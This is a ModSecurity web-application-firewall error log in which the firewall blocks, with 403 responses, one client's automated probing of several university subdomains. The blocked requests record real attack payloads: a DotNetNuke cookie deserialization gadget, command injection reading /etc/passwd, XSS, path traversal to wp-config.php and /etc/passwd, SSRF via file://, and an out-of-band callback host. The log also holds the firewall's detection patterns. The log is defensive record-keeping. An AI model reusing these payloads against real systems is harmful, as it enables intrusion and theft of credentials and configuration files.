type=\\x22System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x22><ExpandedWrapperOfFileSyst [hostname "unla.ac.id"] [uri "/__"] [unique_id "ZO13OMCo-f0AAAdeQ1sAAAAQ"]
[Tue Aug 29 11:42:32.483507 2023] [:error] [pid 1885] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:DNNPersonalization. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: MethodName>WriteFile found within REQUEST_COOKIES:DNNPersonalization: <profile><item key=\\x22name1: key1\\x22 type=\\x22System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x22><ExpandedWrapperOfFileSyst [hostname "ft.unla.ac.id"] [uri "/__"] [unique_id "ZO13OMCo-f0AAAddJsEAAAAh"]
[Tue Aug 29 11:42:33.364190 2023] [:error] [pid 1882] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML: file_datafile_name`{}`.pptx| |cat/etc/passwd||a #service_ppt2lp_size720x540"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/main/webservices/additional_webservices.php"] [unique_id "ZO13OcCo-f0AAAdaZP0AAAAM"]
[Tue Aug 29 11:42:33.372782 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:DNNPersonalization. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: MethodName>WriteFile found within REQUEST_COOKIES:DNNPersonalization: <profile><item key=\\x22name1: key1\\x22 type=\\x22System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x22><ExpandedWrapperOfFileSyst [hostname "www.unla.ac.id"] [uri "/__"] [unique_id "ZO13OcCo-f0AAAdUc2QAAAAZ"]
[Tue Aug 29 11:42:33.388567 2023] [:error] [pid 1913] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML: file_datafile_name`{}`.pptx| |cat/etc/passwd||a #service_ppt2lp_size720x540"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/main/webservices/additional_webservices.php"] [unique_id "ZO13OcCo-f0AAAd5nrgAAAAm"]
[Tue Aug 29 11:42:33.396000 2023] [:error] [pid 1915] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gzj4dx18ekaf7x.oast.site found within TX:1: cjmnbitjmimt14dgn26gzj4dx18ekaf7x.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO13OcCo-f0AAAd7fUcAAAAq"]
[Tue Aug 29 11:42:34.393062 2023] [:error] [pid 1910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML: file_datafile_name`{}`.pptx| |cat/etc/passwd||a #service_ppt2lp_size720x540"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/main/webservices/additional_webservices.php"] [unique_id "ZO13OsCo-f0AAAd230sAAAAI"]
[Tue Aug 29 11:42:34.395340 2023] [:error] [pid 1889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML: file_datafile_name`{}`.pptx| |cat/etc/passwd||a #service_ppt2lp_size720x540"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/main/webservices/additional_webservices.php"] [unique_id "ZO13OsCo-f0AAAdhH0oAAAAB"]
[Tue Aug 29 11:42:34.401875 2023] [:error] [pid 1917] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML: file_datafile_name`{}`.pptx| |cat/etc/passwd||a #service_ppt2lp_size720x540"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/main/webservices/additional_webservices.php"] [unique_id "ZO13OsCo-f0AAAd9ULcAAAAr"]
[Tue Aug 29 11:42:34.417316 2023] [:error] [pid 1885] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:file: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/avatar_uploader.pages.inc"] [unique_id "ZO13OsCo-f0AAAddJsQAAAAh"]
[Tue Aug 29 11:42:34.418751 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:file: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/avatar_uploader.pages.inc"] [unique_id "ZO13OsCo-f0AAAdSZMYAAAAX"]
[Tue Aug 29 11:42:34.431712 2023] [:error] [pid 1889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:file: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/avatar_uploader.pages.inc"] [unique_id "ZO13OsCo-f0AAAdhH0sAAAAB"]
[Tue Aug 29 11:42:34.443537 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:file: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/avatar_uploader.pages.inc"] [unique_id "ZO13OsCo-f0AAAcvBlMAAAAJ"]
[Tue Aug 29 11:42:34.459816 2023] [:error] [pid 1855] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:file: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/avatar_uploader.pages.inc"] [unique_id "ZO13OsCo-f0AAAc-52IAAAAN"]
[Tue Aug 29 11:42:34.468874 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML: file_datafile_name`{}`.pptx| |cat/etc/passwd||a #service_ppt2lp_size720x540"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/main/webservices/additional_webservices.php"] [unique_id "ZO13OsCo-f0AAAc@cYsAAAAL"]
[Tue Aug 29 11:42:35.372845 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:file: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/avatar_uploader.pages.inc"] [unique_id "ZO13O8Co-f0AAAdftSkAAAAG"]
[Tue Aug 29 11:42:40.359042 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php"] [unique_id "ZO13QMCo-f0AAAQSW10AAAA0"]
[Tue Aug 29 11:42:40.365285 2023] [:error] [pid 1913] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:query: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/filter/jmol/js/jsmol/php/jsmol.php"] [unique_id "ZO13QMCo-f0AAAd5nscAAAAm"]
[Tue Aug 29 11:42:40.389452 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php"] [unique_id "ZO13QMCo-f0AAAdxURwAAAAC"]
[Tue Aug 29 11:42:40.393369 2023] [:error] [pid 1917] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:query: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/filter/jmol/js/jsmol/php/jsmol.php"] [unique_id "ZO13QMCo-f0AAAd9UMQAAAAr"]
[Tue Aug 29 11:42:40.403021 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:query: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/filter/jmol/js/jsmol/php/jsmol.php"] [unique_id "ZO13QMCo-f0AAAQSW14AAAA0"]
[Tue Aug 29 11:42:40.438560 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php"] [unique_id "ZO13QMCo-f0AAAQSW18AAAA0"]
[Tue Aug 29 11:42:40.462875 2023] [:error] [pid 1913] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:query: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/filter/jmol/js/jsmol/php/jsmol.php"] [unique_id "ZO13QMCo-f0AAAd5nsgAAAAm"]
[Tue Aug 29 11:42:40.518249 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php"] [unique_id "ZO13QMCo-f0AAAdOeSEAAAAS"]
[Tue Aug 29 11:42:40.518461 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php"] [unique_id "ZO13QMCo-f0AAAdQ3hcAAAAV"]
[Tue Aug 29 11:42:40.529630 2023] [:error] [pid 1945] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:query: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/filter/jmol/js/jsmol/php/jsmol.php"] [unique_id "ZO13QMCo-f0AAAeZ54IAAAAN"]
[Tue Aug 29 11:42:41.458288 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:c: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO13QcCo-f0AAAdOeSQAAAAS"]
[Tue Aug 29 11:42:41.459582 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:c: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO13QcCo-f0AAAeX1AsAAAAK"]
[Tue Aug 29 11:42:41.472566 2023] [:error] [pid 1923] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:c: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO13QcCo-f0AAAeDiqUAAAAx"]
[Tue Aug 29 11:42:41.474914 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php"] [unique_id "ZO13QcCo-f0AAAeChXgAAAAw"]
[Tue Aug 29 11:42:41.477954 2023] [:error] [pid 1924] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:query: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/filter/jmol/js/jsmol/php/jsmol.php"] [unique_id "ZO13QcCo-f0AAAeEDv8AAAAy"]
